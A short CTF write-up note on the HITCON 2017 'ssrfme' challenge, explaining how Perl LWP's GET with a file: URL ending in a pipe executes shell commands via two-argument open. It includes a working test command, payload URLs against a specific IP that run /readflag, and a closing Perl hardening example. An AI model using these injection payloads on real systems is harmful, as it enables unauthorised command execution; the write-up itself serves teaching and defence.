Command execution vulnerability in GET

This comes from the write-up for the hitcon challenge ssrfme; I then searched for the vulnerability and am making a short note of it here. https://lorexxar.cn/2017/11/10/hitcon2017-writeup/#sql-so-hard

First, you need to know that Perl's open can execute commands, as shown below:

And the GET command (from LWP) calls the open function:

file.pm
84: opendir(D, $path) or
132: open(F, $path) or return new

At the same time, the file protocol is supported as well, as the LWP documentation shows:

root@iZ285ei82c1Z:~/test# cat /usr/share/perl5/LWP.pm
...
=head2 File Request
The library supports GET and HEAD methods for file requests. The
"If-Modified-Since" header is supported. All other headers are
ignored. The I<host> component of the file URL must be empty or set
to "localhost". Any other I<host> value will be treated as an error.
Directories are always converted to an HTML document. For normal
files, the "Content-Type" and "Content-Encoding" in the response are
guessed based on the file suffix.
Example:
$req = HTTP::Request->new(GET => 'file:/etc/passwd');
...

Embarrassingly, though, my attempt to reproduce it failed, so I can only copy from @LoRexxar.
We can test it:

root@iZ285ei82c1Z:~/test# GET 'file:id|'
uid=0(root) gid=0(root) groups=0(root)

The command executed successfully. The payload comes from rr's blog:

http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=bash%20-c%20/readflag|
http://13.115.136.15/sandbox/c36eb1c4372f5f8131542751d486cebd/bash%20-c%20/readflag%7C
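The root cause is Perl's two-argument open, where the mode is parsed out of the string itself, so a trailing "|" turns a "path" into a command pipeline. The script below is an added example (not code from the post or from LWP) that contrasts that form with the three-argument open, which treats the string as a literal file name; the path value 'id|' is constructed to mirror the test above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Vulnerable pattern, same shape as "open(F, $path)" in LWP's file.pm:
# with two arguments, Perl reads the mode from the string. A trailing "|"
# means "run this as a command and read its stdout".
sub read_two_arg {
    my ($path) = @_;
    open(my $fh, $path) or return "open failed: $!";
    local $/;                 # slurp mode
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Hardened pattern: the mode is a separate argument, so "|", "<", ">"
# inside $path have no special meaning and it is opened as a plain file.
sub read_three_arg {
    my ($path) = @_;
    open(my $fh, '<', $path) or return "open failed: $!";
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Extra check for code that must keep the two-argument form: refuse any
# path whose leading or trailing characters would be parsed as a mode.
sub looks_like_open_mode {
    my ($path) = @_;
    return $path =~ /^\s*[<>+|&-]/ || $path =~ /\|\s*$/;
}

# Constructed input mirroring the "file:id|" test from the post.
my $path = 'id|';
print "two-arg  : ", read_two_arg($path);    # the pipe is executed
print "three-arg: ", read_three_arg($path);  # no file named "id|" -> open fails
print "flagged  : ", (looks_like_open_mode($path) ? "yes" : "no"), "\n";
```

Any Perl code that passes user-controlled data into a two-argument open (or into open via a file: URL handled by LWP) has the same problem; switching to the three-argument form removes it.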
